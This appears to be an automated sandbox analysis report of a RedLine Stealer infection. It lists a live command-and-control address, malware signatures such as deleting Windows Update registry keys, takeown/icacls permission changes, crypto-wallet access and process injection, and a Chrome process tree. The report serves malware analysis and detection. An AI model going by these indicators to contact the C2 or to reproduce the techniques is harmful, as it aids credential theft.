Analysis
-
max time kernel
127s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04-05-2022 20:50
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
redline
91.243.59.131:7171
-
auth_value
96d69279c8f3c20c9b0e295e5a3be546
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5264-136-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
Loader.exeWindowsDefender.exeservices.exepid process 1928 Loader.exe 6000 WindowsDefender.exe 2568 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exepid process 1876 takeown.exe 8 icacls.exe 3292 icacls.exe 3400 takeown.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exepid process 8 icacls.exe 3292 icacls.exe 3400 takeown.exe 1876 takeown.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Loader.execonhost.exedescription pid process target process PID 1928 set thread context of 5264 1928 Loader.exe AppLaunch.exe PID 3952 set thread context of 5116 3952 conhost.exe conhost.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 51 IoCs
Processes:
powershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Modifies registry class 2 IoCs
Processes:
chrome.exechrome.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2632097139-1792035885-811742494-1000\{681DB1DB-BAE7-40E0-892B-053C6D532A7F} chrome.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 6108 reg.exe 3780 reg.exe 5228 reg.exe 3992 reg.exe 5084 reg.exe 3780 reg.exe 5136 reg.exe 4920 reg.exe 3684 reg.exe 2268 reg.exe 5220 reg.exe 5900 reg.exe 5952 reg.exe 5060 reg.exe 5320 reg.exe 3992 reg.exe 4288 reg.exe 4992 reg.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe7zFM.exechrome.exeAppLaunch.exepowershell.execonhost.exepowershell.execonhost.exechrome.exepid process 3856 chrome.exe 3856 chrome.exe 2768 chrome.exe 2768 chrome.exe 5008 chrome.exe 5008 chrome.exe 4916 chrome.exe 4916 chrome.exe 5240 chrome.exe 5240 chrome.exe 5248 chrome.exe 5248 chrome.exe 5492 chrome.exe 5492 chrome.exe 6132 chrome.exe 6132 chrome.exe 6112 7zFM.exe 6112 7zFM.exe 2768 chrome.exe 2768 chrome.exe 2792 chrome.exe 2792 chrome.exe 5264 AppLaunch.exe 5264 AppLaunch.exe 6112 7zFM.exe 6112 7zFM.exe 6112 7zFM.exe 6112 7zFM.exe 5492 powershell.exe 5492 powershell.exe 5492 powershell.exe 632 conhost.exe 632 conhost.exe 6112 7zFM.exe 6112 7zFM.exe 6112 7zFM.exe 6112 7zFM.exe 6112 7zFM.exe 6112 7zFM.exe 5968 powershell.exe 5968 powershell.exe 5968 powershell.exe 3952 conhost.exe 3952 conhost.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid process 6112 7zFM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 37 IoCs
Processes:
chrome.exepid process 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
7zFM.exeAppLaunch.exepowershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exedescription pid process Token: SeRestorePrivilege 6112 7zFM.exe Token: 35 6112 7zFM.exe Token: SeSecurityPrivilege 6112 7zFM.exe Token: SeDebugPrivilege 5264 AppLaunch.exe Token: SeDebugPrivilege 5492 powershell.exe Token: SeDebugPrivilege 632 conhost.exe Token: SeTakeOwnershipPrivilege 1876 takeown.exe Token: SeDebugPrivilege 5968 powershell.exe Token: SeDebugPrivilege 3952 conhost.exe Token: SeTakeOwnershipPrivilege 3400 takeown.exe -
Suspicious use of FindShellTrayWindow 40 IoCs
Processes:
chrome.exe7zFM.exepid process 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 6112 7zFM.exe 6112 7zFM.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
chrome.exepid process 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe 2768 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 2768 wrote to memory of 2400 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 2400 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1480 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 3856 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 3856 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe PID 2768 wrote to memory of 1484 2768 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://gg.gg/10yg8h1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f9d04f50,0x7ff9f9d04f60,0x7ff9f9d04f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2040 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2280 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4716 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3672 /prefetch:82⤵
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6504 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6616 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6800 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6580 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6572 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:12⤵
-
